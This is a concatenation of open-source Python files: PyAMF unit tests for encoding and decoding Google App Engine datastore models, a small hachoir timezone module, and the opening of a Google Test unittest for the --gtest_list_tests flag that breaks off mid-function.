'\tname\x06\x0fJessica',
'\t_key%s' % self.encodeKey(self.jessica, pyamf.AMF3),
'\x13birthdate\x08\x01B^\xc4\xae\xaa\x00\x00\x00',
'!weight_in_pounds\x04\x05',
'\ttype\x06\x07cat',
'%spayed_or_neutered\x02\x01'
))
self.assertEncodes(self.jessica, bytes, encoding=pyamf.AMF3)
class EncodingExpandoTestCase(BaseTestCase):
"""
Tests for encoding L{db.Expando} classes
"""
def setUp(self):
BaseTestCase.setUp(self)
self.jessica = JessicaFactory.makeJessica(test_models.PetExpando, foo='bar')
self.addCleanup(self.deleteEntity, self.jessica)
def test_amf0(self):
bytes = (
'\x03', (
'\x00\x04_key%s' % self.encodeKey(self.jessica, pyamf.AMF0),
'\x00\tbirthdate\x0bB^\xc4\xae\xaa\x00\x00\x00\x00\x00',
'\x00\x04name\x02\x00\x07Jessica',
'\x00\x12spayed_or_neutered\x01\x00',
'\x00\x04type\x02\x00\x03cat',
'\x00\x10weight_in_pounds\x00@\x14\x00\x00\x00\x00\x00\x00',
'\x00\x03foo\x02\x00\x03bar'
),
'\x00\x00\t'
)
self.assertEncodes(self.jessica, bytes, encoding=pyamf.AMF0)
def test_amf3(self):
bytes = (
'\n\x0b\x01', (
'\tname\x06\x0fJessica',
'\t_key%s' % self.encodeKey(self.jessica, pyamf.AMF3),
'\x13birthdate\x08\x01B^\xc4\xae\xaa\x00\x00\x00',
'!weight_in_pounds\x04\x05',
'\x07foo\x06\x07bar',
'\ttype\x06\x07cat',
'%spayed_or_neutered\x02\x01'
))
self.assertEncodes(self.jessica, bytes, encoding=pyamf.AMF3)
def test_save_amf0(self):
self.put(self.jessica)
bytes = pyamf.encode(self.jessica, encoding=pyamf.AMF0).getvalue()
self.assertBuffer(bytes, ('\x03', (
'\x00\x04_key%s' % self.encodeKey(self.jessica, pyamf.AMF0),
'\x00\tbirthdate\x0bB^\xc4\xae\xaa\x00\x00\x00\x00\x00',
'\x00\x04name\x02\x00\x07Jessica',
'\x00\x12spayed_or_neutered\x01\x00',
'\x00\x04type\x02\x00\x03cat',
'\x00\x10weight_in_pounds\x00@\x14\x00\x00\x00\x00\x00\x00',
'\x00\x03foo\x02\x00\x03bar'),
'\x00\x00\t'))
def test_save_amf3(self):
self.put(self.jessica)
bytes = (
'\n\x0b\x01', (
'\tname\x06\x0fJessica',
'\t_key%s' % self.encodeKey(self.jessica, pyamf.AMF3),
'\x13birthdate\x08\x01B^\xc4\xae\xaa\x00\x00\x00',
'!weight_in_pounds\x04\x05',
'\x07foo\x06\x07bar',
'\ttype\x06\x07cat',
'%spayed_or_neutered\x02\x01'
))
self.assertEncodes(self.jessica, bytes, encoding=pyamf.AMF3)
def test_alias_amf0(self):
pyamf.register_class(test_models.PetExpando, 'Pet')
bytes = pyamf.encode(self.jessica, encoding=pyamf.AMF0).getvalue()
self.assertBuffer(bytes, ('\x10\x00\x03Pet', (
'\x00\x04_key%s' % self.encodeKey(self.jessica, pyamf.AMF0),
'\x00\tbirthdate\x0bB^\xc4\xae\xaa\x00\x00\x00\x00\x00',
'\x00\x04name\x02\x00\x07Jessica',
'\x00\x12spayed_or_neutered\x01\x00',
'\x00\x04type\x02\x00\x03cat',
'\x00\x10weight_in_pounds\x00@\x14\x00\x00\x00\x00\x00\x00',
'\x00\x03foo\x02\x00\x03bar'),
'\x00\x00\t'))
def test_alias_amf3(self):
pyamf.register_class(test_models.PetExpando, 'Pet')
bytes = (
'\n\x0b\x07Pet', (
'\tname\x06\x0fJessica',
'\t_key%s' % self.encodeKey(self.jessica, pyamf.AMF3),
'\x13birthdate\x08\x01B^\xc4\xae\xaa\x00\x00\x00',
'!weight_in_pounds\x04\x05',
'\x07foo\x06\x07bar',
'\ttype\x06\x07cat',
'%spayed_or_neutered\x02\x01'
))
self.assertEncodes(self.jessica, bytes, encoding=pyamf.AMF3)
class EncodingReferencesTestCase(BaseTestCase):
"""
This test case refers to L{db.ReferenceProperty<http://code.google.com/app
engine/docs/datastore/typesandpropertyclasses.html#ReferenceProperty>},
not AMF references.
"""
def test_model(self):
a = test_models.Author(name='Jane Austen')
self.put(a)
k = str(a.key())
amf0_k = self.encodeKey(a, pyamf.AMF0)
amf3_k = self.encodeKey(a, pyamf.AMF3)
b = test_models.Novel(title='Sense and Sensibility', author=a)
self.assertIdentical(b.author, a)
bytes = (
'\x03', (
'\x00\x05title\x02\x00\x15Sense and Sensibility',
'\x00\x04_key' + amf0_k,
'\x00\x06author\x03', (
'\x00\x04name\x02\x00\x0bJane Austen',
'\x00\x04_key\x05'
),
'\x00\x00\t'
),
'\x00\x00\t')
self.assertEncodes(b, bytes, encoding=pyamf.AMF0)
bytes = (
'\n\x0b\x01', ((
'\rauthor\n\x0b\x01', (
'\t_key' + amf3_k,
'\tname\x06\x17Jane Austen'
), '\x01\x06\x01'),
'\x0btitle\x06+Sense and Sensibility'
),
'\x01')
self.assertEncodes(b, bytes, encoding=pyamf.AMF3)
# now test with aliases ..
pyamf.register_class(test_models.Author, 'Author')
pyamf.register_class(test_models.Novel, 'Novel')
bytes = (
'\x10\x00\x05Novel', (
'\x00\x05title\x02\x00\x15Sense and Sensibility',
'\x00\x04_key' + amf0_k,
'\x00\x06author\x10\x00\x06Author', (
'\x00\x04name\x02\x00\x0bJane Austen',
'\x00\x04_key\x05'
),
'\x00\x00\t'
),
'\x00\x00\t')
self.assertEncodes(b, bytes, encoding=pyamf.AMF0)
bytes = (
'\n\x0b\x0bNovel', ((
'\rauthor\n\x0b\rAuthor', (
'\t_key' + amf3_k,
'\tname\x06\x17Jane Austen'
), '\x01\n\x01'),
'\x0btitle\x06+Sense and Sensibility'
),
'\x01')
self.assertEncodes(b, bytes, encoding=pyamf.AMF3)
def test_expando(self):
class Author(db.Expando):
name = db.StringProperty()
class Novel(db.Expando):
title = db.StringProperty()
author = db.ReferenceProperty(Author)
a = Author(name='Jane Austen')
self.put(a)
k = str(a.key())
amf0_k = struct.pack('>H', len(k)) + k
amf3_k = amf3.encode_int(len(k) << 1 | amf3.REFERENCE_BIT) + k
b = Novel(title='Sense and Sensibility', author=a)
self.assertIdentical(b.author, a)
bytes = (
'\x03', (
'\x00\x05title\x02\x00\x15Sense and Sensibility',
'\x00\x04_key\x02' + amf0_k,
'\x00\x06author\x03', (
'\x00\x04name\x02\x00\x0bJane Austen',
'\x00\x04_key\x05'
),
'\x00\x00\t'
),
'\x00\x00\t')
self.assertEncodes(b, bytes, encoding=pyamf.AMF0)
bytes = (
'\n\x0b\x01', ((
'\rauthor\n\x0b\x01', (
'\t_key\x06' + amf3_k,
'\tname\x06\x17Jane Austen\x01'
), '\x02\x01'),
'\x0btitle\x06+Sense and Sensibility'
),
'\x01')
self.assertEncodes(b, bytes, encoding=pyamf.AMF3)
# now test with aliases ..
pyamf.register_class(Author, 'Author')
pyamf.register_class(Novel, 'Novel')
bytes = (
'\x10\x00\x05Novel', (
'\x00\x05title\x02\x00\x15Sense and Sensibility',
'\x00\x04_key\x02' + amf0_k,
'\x00\x06author\x10\x00\x06Author', (
'\x00\x04name\x02\x00\x0bJane Austen',
'\x00\x04_key\x05'
),
'\x00\x00\t'
),
'\x00\x00\t')
self.assertEncodes(b, bytes, encoding=pyamf.AMF0)
bytes = (
'\n\x0b\x0bNovel', ((
'\rauthor\n\x0b\rAuthor', (
'\t_key\x06' + amf3_k,
'\tname\x06\x17Jane Austen\x01'
), '\x06\x01'),
'\x0btitle\x06+Sense and Sensibility'
),
'\x01')
self.assertEncodes(b, bytes, encoding=pyamf.AMF3)
def test_dynamic_property_referenced_object(self):
a = test_models.Author(name='Jane Austen')
self.put(a)
b = test_models.Novel(title='Sense and Sensibility', author=a)
self.put(b)
x = db.get(b.key())
foo = [1, 2, 3]
x.author.bar = foo
ek = self.encodeKey(x, pyamf.AMF0)
el = self.encodeKey(a, pyamf.AMF0)
bytes = (
'\x03', (
'\x00\x05title\x02\x00\x15Sense and Sensibility',
'\x00\x04_key' + ek,
'\x00\x06author\x03', (
'\x00\x03bar\n\x00\x00\x00\x03\x00?\xf0\x00\x00\x00\x00'
'\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00@\x08\x00'
'\x00\x00\x00\x00\x00',
'\x00\x04name\x02\x00\x0bJane Austen',
'\x00\x04_key' + el
),
'\x00\x00\t'
),
'\x00\x00\t')
self.assertEncodes(x, bytes, encoding=pyamf.AMF0)
class ListPropertyTestCase(BaseTestCase):
"""
Tests for L{db.ListProperty} properties.
"""
def setUp(self):
BaseTestCase.setUp(self)
self.obj = test_models.ListModel()
self.obj.numbers = [2, 4, 6, 8, 10]
self.addCleanup(self.deleteEntity, self.obj)
def test_encode_amf0(self):
bytes = (
'\x03', (
'\x00\x04_key\x05',
'\x00\x07numbers\n\x00\x00\x00\x05\x00@'
'\x00\x00\x00\x00\x00\x00\x00\x00@\x10\x00\x00\x00\x00\x00'
'\x00\x00@\x18\x00\x00\x00\x00\x00\x00\x00@\x20\x00\x00\x00'
'\x00\x00\x00\x00@$\x00\x00\x00\x00\x00\x00'
),
'\x00\x00\t'
)
self.assertEncodes(self.obj, bytes, encoding=pyamf.AMF0)
def test_encode_amf3(self):
bytes = (
'\n\x0b\x01', (
'\t_key\x01',
'\x0fnumbers\t\x0b\x01\x04\x02\x04\x04\x04\x06\x04\x08\x04\n'
'\x01'
)
)
self.assertEncodes(self.obj, bytes, encoding=pyamf.AMF3)
def test_encode_amf0_registered(self):
pyamf.register_class(test_models.ListModel, 'list-model')
bytes = (
'\x10\x00\nlist-model', (
'\x00\x04_key\x05',
'\x00\x07numbers\n\x00\x00\x00\x05\x00@'
'\x00\x00\x00\x00\x00\x00\x00\x00@\x10\x00\x00\x00\x00\x00'
'\x00\x00@\x18\x00\x00\x00\x00\x00\x00\x00@\x20\x00\x00\x00'
'\x00\x00\x00\x00@$\x00\x00\x00\x00\x00\x00'
),
'\x00\x00\t'
)
self.assertEncodes(self.obj, bytes, encoding=pyamf.AMF0)
def test_encode_amf3_registered(self):
pyamf.register_class(test_models.ListModel, 'list-model')
bytes = (
'\n\x0b\x15list-model', (
'\t_key\x01',
'\x0fnumbers\t\x0b\x01\x04\x02\x04\x04\x04\x06\x04\x08\x04\n'
'\x01'
)
)
self.assertEncodes(self.obj, bytes, encoding=pyamf.AMF3)
def _check_list(self, x):
self.assertTrue(isinstance(x, test_models.ListModel))
self.assertTrue(hasattr(x, 'numbers'))
self.assertEqual(x.numbers, [2, 4, 6, 8, 10])
def test_decode_amf0(self):
pyamf.register_class(test_models.ListModel, 'list-model')
bytes = (
'\x10\x00\nlist-model\x00\x07numbers\n\x00\x00\x00\x05\x00@\x00'
'\x00\x00\x00\x00\x00\x00\x00@\x10\x00\x00\x00\x00\x00\x00\x00@'
'\x18\x00\x00\x00\x00\x00\x00\x00@ \x00\x00\x00\x00\x00\x00\x00@'
'$\x00\x00\x00\x00\x00\x00\x00\x00\t')
x = self.decode(bytes, encoding=pyamf.AMF0)
self._check_list(x)
def test_decode_amf3(self):
pyamf.register_class(test_models.ListModel, 'list-model')
bytes = (
'\n\x0b\x15list-model\x0fnumbers\t\x0b\x01\x04\x02\x04\x04\x04'
'\x06\x04\x08\x04\n\x01')
x = self.decode(bytes, encoding=pyamf.AMF3)
self._check_list(x)
def test_none(self):
pyamf.register_class(test_models.ListModel, 'list-model')
bytes = '\x10\x00\nlist-model\x00\x07numbers\x05\x00\x00\t'
x = self.decode(bytes, encoding=pyamf.AMF0)
self.assertEqual(x.numbers, [])
class DecodingModelTestCase(BaseTestCase):
"""
"""
def getModel(self):
return test_models.PetModel
def setUp(self):
BaseTestCase.setUp(self)
self.model_class = self.getModel()
self.jessica = JessicaFactory.makeJessica(self.model_class)
pyamf.register_class(self.model_class, 'Pet')
self.put(self.jessica)
self.key = str(self.jessica.key())
def _check_model(self, x):
self.assertTrue(isinstance(x, self.model_class))
self.assertEqual(x.__class__, self.model_class)
self.assertEqual(x.type, self.jessica.type)
self.assertEqual(x.weight_in_pounds, self.jessica.weight_in_pounds)
self.assertEqual(x.birthdate, self.jessica.birthdate)
self.assertEqual(x.spayed_or_neutered, self.jessica.spayed_or_neutered)
# now check db.Model internals
self.assertEqual(x.key(), self.jessica.key())
self.assertEqual(x.kind(), self.jessica.kind())
self.assertEqual(x.parent(), self.jessica.parent())
self.assertEqual(x.parent_key(), self.jessica.parent_key())
self.assertTrue(x.is_saved())
def test_amf0(self):
bytes = (
'\x10\x00\x03Pet\x00\x04_key%s\x00\x04type\x02\x00\x03cat'
'\x00\x10weight_in_pounds\x00@\x14\x00\x00\x00\x00\x00\x00\x00'
'\x04name\x02\x00\x07Jessica\x00\tbirthdate\x0bB^\xc4\xae\xaa\x00'
'\x00\x00\x00\x00\x00\x12spayed_or_neutered\x01\x00\x00\x00\t' % (
self.encodeKey(self.key, pyamf.AMF0),))
x = self.decode(bytes, encoding=pyamf.AMF0)
self._check_model(x)
def test_amf3(self):
bytes = (
'\n\x0b\x07Pet\tname\x06\x0fJessica\t_key%s\x13birthdate'
'\x08\x01B^\xc4\xae\xaa\x00\x00\x00!weight_in_pounds\x04\x05\x07'
'foo\x06\x07bar\ttype\x06\x07cat%%spayed_or_neutered\x02\x01' % (
self.encodeKey(self.key, pyamf.AMF3),))
x = self.decode(bytes, encoding=pyamf.AMF3)
self._check_model(x)
class DecodingExpandoTestCase(DecodingModelTestCase):
"""
"""
def getModel(self):
return test_models.PetExpando
class ClassAliasTestCase(BaseTestCase):
"""
"""
def setUp(self):
BaseTestCase.setUp(self)
self.alias = adapter_db.DataStoreClassAlias(test_models.PetModel, 'foo.bar')
self.jessica = test_models.PetModel(name='Jessica', type='cat')
self.jessica_expando = test_models.PetExpando(name='Jessica', type='cat')
self.jessica_expando.foo = 'bar'
self.addCleanup(self.deleteEntity, self.jessica)
self.addCleanup(self.deleteEntity, self.jessica_expando)
def test_get_alias(self):
alias = pyamf.register_class(test_models.PetModel)
self.assertTrue(isinstance(alias, adapter_db.DataStoreClassAlias))
def test_alias(self):
self.alias.compile()
self.assertEqual(self.alias.decodable_properties, [
'birthdate',
'name',
'spayed_or_neutered',
'type',
'weight_in_pounds'
])
self.assertEqual(self.alias.encodable_properties, [
'birthdate',
'name',
'spayed_or_neutered',
'type',
'weight_in_pounds'
])
self.assertEqual(self.alias.static_attrs, [])
self.assertEqual(self.alias.readonly_attrs, None)
self.assertEqual(self.alias.exclude_attrs, None)
self.assertEqual(self.alias.reference_properties, None)
def test_create_instance(self):
x = self.alias.createInstance()
self.assertTrue(isinstance(x, adapter_db.ModelStub))
self.assertTrue(hasattr(x, 'klass'))
self.assertEqual(x.klass, self.alias.klass)
# test some stub functions
self.assertEqual(x.properties(), self.alias.klass.properties())
self.assertEqual(x.dynamic_properties(), [])
def test_apply(self):
x = self.alias.createInstance()
self.assertTrue(hasattr(x, 'klass'))
self.alias.applyAttributes(x, {
adapter_db.DataStoreClassAlias.KEY_ATTR: None,
'name': 'Jessica',
'type': 'cat',
'birthdate': None,
'weight_in_pounds': None,
'spayed_or_neutered': None
})
self.assertFalse(hasattr(x, 'klass'))
def test_get_attrs(self):
attrs = self.alias.getEncodableAttributes(self.jessica)
self.assertEqual(attrs, {
'_key': None,
'type': 'cat',
'name': 'Jessica',
'birthdate': None,
'weight_in_pounds': None,
'spayed_or_neutered': None
})
def test_get_attrs_expando(self):
attrs = self.alias.getEncodableAttributes(self.jessica_expando)
self.assertEqual(attrs, {
'_key': None,
'type': 'cat',
'name': 'Jessica',
'birthdate': None,
'weight_in_pounds': None,
'spayed_or_neutered': None,
'foo': 'bar'
})
def test_get_attributes(self):
attrs = self.alias.getEncodableAttributes(self.jessica)
self.assertEqual(attrs, {
'_key': None,
'type': 'cat',
'name': 'Jessica',
'birthdate': None,
'weight_in_pounds': None,
'spayed_or_neutered': None
})
def test_get_attributes_saved(self):
self.put(self.jessica)
attrs = self.alias.getEncodableAttributes(self.jessica)
self.assertEqual(attrs, {
'name': 'Jessica',
'_key': str(self.jessica.key()),
'type': 'cat',
'birthdate': None,
'weight_in_pounds': None,
'spayed_or_neutered': None
})
def test_get_attributes_expando(self):
attrs = self.alias.getEncodableAttributes(self.jessica_expando)
self.assertEqual(attrs, {
'name': 'Jessica',
'_key': None,
'type': 'cat',
'birthdate': None,
'weight_in_pounds': None,
'spayed_or_neutered': None,
'foo': 'bar'
})
def test_get_attributes_saved_expando(self):
self.put(self.jessica_expando)
attrs = self.alias.getEncodableAttributes(self.jessica_expando)
self.assertEqual(attrs, {
'name': 'Jessica',
'_key': str(self.jessica_expando.key()),
'type': 'cat',
'birthdate': None,
'weight_in_pounds': None,
'spayed_or_neutered': None,
'foo': 'bar'
})
def test_arbitrary_properties(self):
self.jessica.foo = 'bar'
attrs = self.alias.getEncodableAttributes(self.jessica)
self.assertEqual(attrs, {
'_key': None,
'type': 'cat',
'name': 'Jessica',
'birthdate': None,
'weight_in_pounds': None,
'spayed_or_neutered': None,
'foo': 'bar'
})
def test_property_type(self):
class PropertyTypeModel(db.Model):
@property
def readonly(self):
return True
def _get_prop(self):
return False
def _set_prop(self, v):
self.prop = v
read_write = property(_get_prop, _set_prop)
alias = adapter_db.DataStoreClassAlias(PropertyTypeModel, 'foo.bar')
obj = PropertyTypeModel()
attrs = alias.getEncodableAttributes(obj)
self.assertEqual(attrs, {
'_key': None,
'read_write': False,
'readonly': True
})
self.assertFalse(hasattr(obj, 'prop'))
alias.applyAttributes(obj, {
'_key': None,
'readonly': False,
'read_write': 'foo'
})
self.assertEqual(obj.prop, 'foo')
class ReferencesTestCase(BaseTestCase):
"""
"""
def setUp(self):
BaseTestCase.setUp(self)
self.jessica = test_models.PetModel(name='Jessica', type='cat')
self.jessica.birthdate = datetime.date(1986, 10, 2)
self.jessica.weight_in_pounds = 5
self.jessica.spayed_or_neutered = False
self.put(self.jessica)
self.jessica2 = db.get(self.jessica.key())
        self.assertNotIdentical(self.jessica, self.jessica2)
self.assertEqual(str(self.jessica.key()), str(self.jessica2.key()))
def failOnGet(self, *args, **kwargs):
self.fail('Get attempted %r, %r' % (args, kwargs))
def test_amf0(self):
encoder = pyamf.get_encoder(pyamf.AMF0)
stream = encoder.stream
encoder.writeElement(self.jessica)
stream.truncate()
encoder.writeElement(self.jessica2)
self.assertEqual(stream.getvalue(), '\x07\x00\x00')
def test_amf3(self):
encoder = pyamf.get_encoder(pyamf.AMF3)
stream = encoder.stream
encoder.writeElement(self.jessica)
stream.truncate()
encoder.writeElement(self.jessica2)
self.assertEqual(stream.getvalue(), '\n\x00')
def test_nullreference(self):
c = test_models.Novel(title='Pride and Prejudice', author=None)
self.put(c)
encoder = pyamf.get_encoder(encoding=pyamf.AMF3)
alias = adapter_db.DataStoreClassAlias(test_models.Novel, None)
attrs = alias.getEncodableAttributes(c, codec=encoder)
self.assertEqual(attrs, {
'_key': str(c.key()),
'title': 'Pride and Prejudice',
'author': None
})
class GAEReferenceCollectionTestCase(BaseTestCase):
"""
"""
def setUp(self):
BaseTestCase.setUp(self)
self.klass = adapter_db.GAEReferenceCollection
def test_init(self):
x = self.klass()
self.assertEqual(x, {})
def test_get(self):
x = self.klass()
# not a class type
self.assertRaises(TypeError, x.getClassKey, chr, '')
# not a subclass of db.Model/db.Expando
self.assertRaises(TypeError, x.getClassKey, Spam, '')
x = self.klass()
self.assertRaises(KeyError, x.getClassKey, test_models.PetModel, 'foo')
self.assertEqual(x, {test_models.PetModel: {}})
obj = object()
x[test_models.PetModel]['foo'] = obj
obj2 = x.getClassKey(test_models.PetModel, 'foo')
self.assertEqual(id(obj), id(obj2))
self.assertEqual(x, {test_models.PetModel: {'foo': obj}})
def test_add(self):
x = self.klass()
# not a class type
self.assertRaises(TypeError, x.addClassKey, chr, '')
# not a subclass of db.Model/db.Expando
self.assertRaises(TypeError, x.addClassKey, Spam, '')
# wrong type for key
self.assertRaises(TypeError, x.addClassKey, test_models.PetModel, 3)
x = self.klass()
pm1 = test_models.PetModel(type='cat', name='Jessica')
pm2 = test_models.PetModel(type='dog', name='Sam')
pe1 = test_models.PetExpando(type='cat', name='Toby')
self.assertEqual(x, {})
x.addClassKey(test_models.PetModel, 'foo', pm1)
self.assertEqual(x, {test_models.PetModel: {'foo': pm1}})
x.addClassKey(test_models.PetModel, 'bar', pm2)
self.assertEqual(x, {test_models.PetModel: {'foo': pm1, 'bar': pm2}})
x.addClassKey(test_models.PetExpando, 'baz', pe1)
self.assertEqual(x, {
test_models.PetModel: {'foo': pm1, 'bar': pm2},
test_models.PetExpando: {'baz': pe1}
})
class HelperTestCase(BaseTestCase):
"""
"""
def test_getGAEObjects(self):
context = Spam()
context.extra = {}
x = adapter_db.getGAEObjects(context)
self.assertTrue(isinstance(x, adapter_db.GAEReferenceCollection))
self.assertTrue('gae_objects' in context.extra)
self.assertEqual(id(x), id(context.extra['gae_objects']))
def test_Query_type(self):
"""
        L{db.Query} instances are converted to lists when encoded.
"""
q = test_models.EmptyModel.all()
self.assertTrue(isinstance(q, db.Query))
self.assertEncodes(q, '\n\x00\x00\x00\x00', encoding=pyamf.AMF0)
self.assertEncodes(q, '\t\x01\x01', encoding=pyamf.AMF3)
class FloatPropertyTestCase(BaseTestCase):
"""
Tests for #609.
"""
def setUp(self):
BaseTestCase.setUp(self)
class FloatModel(db.Model):
f = db.FloatProperty()
self.klass = FloatModel
self.f = FloatModel()
self.alias = adapter_db.DataStoreClassAlias(self.klass, None)
def tearDown(self):
BaseTestCase.tearDown(self)
if self.f.is_saved():
self.f.delete()
def test_behaviour(self):
"""
Test the behaviour of the Google SDK not handling ints gracefully
"""
self.assertRaises(db.BadValueError, setattr, self.f, 'f', 3)
self.f.f = 3.0
self.assertEqual(self.f.f, 3.0)
def test_apply_attributes(self):
self.alias.applyAttributes(self.f, {'f': 3})
self.assertEqual(self.f.f, 3.0)
class PolyModelTestCase(BaseTestCase):
"""
Tests for L{db.PolyModel}. See #633
"""
def setUp(self):
BaseTestCase.setUp(self)
class Poly(polymodel.PolyModel):
s = db.StringProperty()
self.klass = Poly
self.p = Poly()
self.alias = adapter_db.DataStoreClassAlias(self.klass, None)
def test_encode(self):
self.p.s = 'foo'
attrs = self.alias.getEncodableAttributes(self.p)
self.assertEqual(attrs, {'_key': None, 's': 'foo'})
def test_deep_inheritance(self):
class DeepPoly(self.klass):
d = db.IntegerProperty()
self.alias = adapter_db.DataStoreClassAlias(DeepPoly, None)
self.dp = DeepPoly()
self.dp.s = 'bar'
self.dp.d = 92
attrs = self.alias.getEncodableAttributes(self.dp)
self.assertEqual(attrs, {
'_key': None,
's': 'bar',
'd': 92
})
class BlobStoreTestCase(BaseTestCase):
"""
Tests for L{blobstore}
"""
bytes = (
'\n\x0bOgoogle.appengine.ext.blobstore.BlobInfo', (
'\tsize\x04\xcb\xad\x07',
'\x11creation\x08\x01Br\x9c\x1d\xbeh\x80\x00',
'\x07key\x06\rfoobar',
'\x19content_type\x06\x15text/plain',
'\x11filename\x06\x1fnot-telling.ogg'
), '\x01')
values = {
'content_type': 'text/plain',
'size': 1234567,
'filename': 'not-telling.ogg',
        'creation': datetime.datetime(2010, 7, 11, 14, 15, 1)
}
def setUp(self):
BaseTestCase.setUp(self)
self.key = blobstore.BlobKey('foobar')
self.info = blobstore.BlobInfo(self.key, self.values)
def test_class_alias(self):
alias_klass = pyamf.get_class_alias(blobstore.BlobInfo)
self.assertIdentical(alias_klass.__class__, adapter_blobstore.BlobInfoClassAlias)
def test_encode(self):
self.assertEncodes(self.info, self.bytes)
def test_decode(self):
def check(ret):
self.assertEqual(ret.key(), self.key)
self.assertDecodes(self.bytes, check)
|
nopjmp/SickRage
|
refs/heads/master
|
lib/hachoir_metadata/timezone.py
|
185
|
from datetime import tzinfo, timedelta
class TimezoneUTC(tzinfo):
"""UTC timezone"""
ZERO = timedelta(0)
def utcoffset(self, dt):
return TimezoneUTC.ZERO
def tzname(self, dt):
return u"UTC"
def dst(self, dt):
return TimezoneUTC.ZERO
def __repr__(self):
return "<TimezoneUTC delta=0, name=u'UTC'>"
class Timezone(TimezoneUTC):
"""Fixed offset in hour from UTC."""
def __init__(self, offset):
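        # offset is in hours; e.g. offset=1 yields the name "+0100".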
self._offset = timedelta(minutes=offset*60)
self._name = u"%+03u00" % offset
def utcoffset(self, dt):
return self._offset
def tzname(self, dt):
return self._name
def __repr__(self):
return "<Timezone delta=%s, name='%s'>" % (
self._offset, self._name)
UTC = TimezoneUTC()
def createTimezone(offset):
if offset:
return Timezone(offset)
else:
return UTC
|
phantasien/falkor
|
refs/heads/master
|
deps/bastian/deps/gtest/test/gtest_list_tests_unittest.py
|
1898
|
#!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for Google Test's --gtest_list_tests flag.
A user can ask Google Test to list all tests by specifying the
--gtest_list_tests flag. This script tests such functionality
by invoking gtest_list_tests_unittest_ (a program written with
Google Test) with the command line flags.
"""
__author__ = 'phanna@google.com (Patrick Hanna)'
import gtest_test_utils
import re
# Constants.
# The command line flag for enabling/disabling listing all tests.
LIST_TESTS_FLAG = 'gtest_list_tests'
# Path to the gtest_list_tests_unittest_ program.
EXE_PATH = gtest_test_utils.GetTestExecutablePath('gtest_list_tests_unittest_')
# The expected output when running gtest_list_tests_unittest_ with
# --gtest_list_tests
EXPECTED_OUTPUT_NO_FILTER_RE = re.compile(r"""FooDeathTest\.
Test1
Foo\.
Bar1
Bar2
DISABLED_Bar3
Abc\.
Xyz
Def
FooBar\.
Baz
FooTest\.
Test1
DISABLED_Test2
Test3
TypedTest/0\. # TypeParam = (VeryLo{245}|class VeryLo{239})\.\.\.
TestA
TestB
TypedTest/1\. # TypeParam = int\s*\*
TestA
TestB
TypedTest/2\. # TypeParam = .*MyArray<bool,\s*42>
TestA
TestB
My/TypeParamTest/0\. # TypeParam = (VeryLo{245}|class VeryLo{239})\.\.\.
TestA
TestB
My/TypeParamTest/1\. # TypeParam = int\s*\*
TestA
TestB
My/TypeParamTest/2\. # TypeParam = .*MyArray<bool,\s*42>
TestA
TestB
MyInstantiation/ValueParamTest\.
TestA/0 # GetParam\(\) = one line
TestA/1 # GetParam\(\) = two\\nlines
TestA/2 # GetParam\(\) = a very\\nlo{241}\.\.\.
TestB/0 # GetParam\(\) = one line
TestB/1 # GetParam\(\) = two\\nlines
TestB/2 # GetParam\(\) = a very\\nlo{241}\.\.\.
""")
# The expected output when running gtest_list_tests_unittest_ with
# --gtest_list_tests and --gtest_filter=Foo*.
EXPECTED_OUTPUT_FILTER_FOO_RE = re.compile(r"""FooDeathTest\.
Test1
Foo\.
Bar1
Bar2
DISABLED_Bar3
FooBar\.
Baz
FooTest\.
Test1
DISABLED_Test2
Test3
""")
# Utilities.
def Run(args):
"""Runs gtest_list_tests_unittest_ and returns the list of tests printed."""
return gtest_test_utils.Subprocess([EXE_PATH] + args,
capture_stderr=False).output
# The unit test.
class GTestListTestsUnitTest(gtest_test_utils.TestCase):
"""Tests using the --gtest_list_tests flag to list all tests."""
def RunAndVerify(self, flag_value, expected_output_re, other_flag):
"""Runs gtest_list_tests_unittest_ and verifies that it prints
the correct tests.
Args:
flag_value: value of the --gtest_list_tests flag;
None if the flag should not be present.
expected_output_re: regular expression that matches the expected
output after running command;
other_flag: a different flag to be passed to command
along with gtest_list_tests;
None if the flag should not be present.
"""
if flag_value is None:
flag = ''
flag_expression = 'not set'
elif flag_value == '0':
flag = '--%s=0' % LIST_TESTS_FLAG
flag_expression = '0'
else:
flag = '--%s' % LIST_TESTS_FLAG
flag_expression = '1'
args = [flag]
if other_flag is not None:
args += [other_flag]
output = Run(args)
if expected_output_re:
self.assert_(
expected_output_re.match(output),
('when %s is %s, the output of "%s" is "%s",\n'
'which does not match regex "%s"' %
(LIST_TESTS_FLAG, flag_expression, ' '.join(args), output,
expected_output_re.pattern)))
else:
self.assert_(
not EXPECTED_OUTPUT_NO_FILTER_RE.match(output),
('when %s is %s, the output of "%s" is "%s"'%
(LIST_TESTS_FLAG, flag_expression, ' '.join(args), output)))
def testDefaultBehavior(self):
"""Tests the behavior of the default mode."""
self.RunAndVerify(flag_value=None,
expected_output_re=None,
other_flag=None)
def testFlag(self):
"""Tests using the --gtest_list_tests flag."""
self.RunAndVerify(flag_value='0',
expected_output_re=None,
